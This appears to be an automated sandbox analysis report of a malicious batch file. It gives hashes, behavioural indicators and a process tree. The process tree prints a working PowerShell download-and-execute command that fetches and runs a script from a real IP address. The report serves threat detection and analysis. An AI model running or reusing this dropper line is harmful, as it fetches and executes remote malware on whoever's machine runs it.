bf720acfb3a2f503222eae5a572791a0230dbf4ce5ed2c02b4f8dda85341c4a9

Analysis

Target

d3fe887fa5f2522fa18e5a7a4c7edeab.bat
Size

219B
MD5

095d4b51311078e00015480ea6d28ab4
SHA1

fc6cc3517edfddf916eb2275b9576d217c6a82b1
SHA256

bf720acfb3a2f503222eae5a572791a0230dbf4ce5ed2c02b4f8dda85341c4a9
SHA512

2a7f213d950e9321dfd88f62fc5c138667c09e337f672edfd8019e3fe78451c39f734399ae308177306f577f4e49730ef7b4bb69530c5e0732d992ab464fa45c

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d3fe887fa5f2522fa18e5a7a4c7edeab

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
852	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
852	powershell.exe
852	powershell.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
3	852	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 852	1088	cmd.exe	25
PID 1088 wrote to memory of 852	1088	cmd.exe	25
PID 1088 wrote to memory of 852	1088	cmd.exe	25
PID 1088 wrote to memory of 852	1088	cmd.exe	25

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\d3fe887fa5f2522fa18e5a7a4c7edeab.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d3fe887fa5f2522fa18e5a7a4c7edeab');Invoke-DWHAFNSROCWU;Start-Sleep -s 10000"
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  PID:852